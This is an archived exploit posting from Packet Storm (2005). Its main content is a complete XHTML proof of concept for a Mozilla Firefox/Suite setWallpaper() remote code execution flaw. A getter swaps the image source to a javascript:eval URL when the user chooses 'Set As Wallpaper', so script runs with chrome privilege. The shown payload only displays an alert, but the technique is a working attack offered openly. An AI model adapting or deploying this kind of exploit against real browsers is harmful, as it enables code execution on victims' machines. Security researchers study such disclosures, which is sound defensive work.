what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

mfsa2005-55exploit.txt

mfsa2005-55exploit.txt
Posted Jul 15, 2005
Authored by moz_bug_r_a4

Mozilla Firefox and Suite setWallpaper() remote code execution exploit.

tags | exploit, remote, code execution
SHA-256 | 27adbee5244e42797d153b572619c417e7592513f3f2a5ca0394d31818ab4535

mfsa2005-55exploit.txt

Change Mirror Download
// Exploit by moz_bug_r_a4
<?xml version="1.0"?>
<html xmlns="https://www.w3.org/1999/xhtml">
<head>
<style>
IMG {
display: block;
width: 96px; height: 96px;
border: 1px solid #f00;
/*background-image: url("https://www.mozilla.org/images/mozilla-16.png");*/
background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUg
AAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29md
HdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAHWSURBVHjaYvz//z8DJQAg
gJiQOe/fv2fv7Oz8rays/N+VkfG/iYnJfyD/1+rVq7ffu3dPFpsBAAHEAHIBCJ85c8bN
2Nj4vwsDw/8zQLwKiO8CcRoQu0DxqlWrdsHUwzBAAIGJmTNnPgYa9j8UqhFElwP
xf2MIDeIrKSn9FwSJoRkAEEAM0DD4DzMAyPi/G+QKY4hh5WAXGf8PDQ0FGwJ2
2d27CjADAAIIrLmjo+MXA9R2kAHvGBA2wwx6B8W7od6CeQcggKCmCEL8bgwx
YCbUIGTDVkHDBia+CuotgACCueD3TDQN75D4xmAvCoK9ARMHBzAw0AECiBH
kAlC0Mdy7x9ABNA3obAZXIAa6iKEcGlMVQHwWyjYuL2d4v2cPg8vZswx7gHyAA
AK7AOif7SAbOqCmn4Ha3AHFsIDtgPq/vLz8P4MSkJ2W9h8ggBjevXvHDo4FQUQ
g/kdypqCg4H8lUIACnQ/SOBMYI8bAsAJFPcj1AAEEjwVQqLpAbXmH5BJjqI0gi9D
TAAgDBBCcAVLkgmQ7yKCZxpCQxqUZhAECCJ4XgMl493ug21ZD+aDAXH0WL
M4A9MZPXJkJIIAwTAR5pQMalaCABQUULttBGCCAGCnNzgABBgAMJ5THwGvJL
AAAAABJRU5ErkJggg==");
}
</style>
</head>

<body>
<h3>Arbitrary code execution via setWallpaper()</h3>
<pre>
1. Right click on the image.
2. Choose "Set As Wallpaper..." from the context menu.

A dialog that shows Components.stack will appear.
</pre>

<IMG id="i"/>

<script>
<![CDATA[
var sx = navigator.productSub < 20050622 ? 2 : 4;

// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);";
var evalCode = code.replace(/'/g, '"').replace(/\\/g, '\\\\');

var u = [ "https://www.mozilla.org/images/mozilla-16.png",
"javascript:eval('" + evalCode + "')" ];

var sc = 0;
var i = document.getElementById("i");
i.addEventListener("contextmenu", function(e) { sc = 0; }, false);
i.__defineGetter__("src", function() {
//return (confirm(++sc)) ? u[0] : u[1];
return (++sc < sx) ? u[0] : u[1];
});
]]>
</script>

</body>
</html>
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close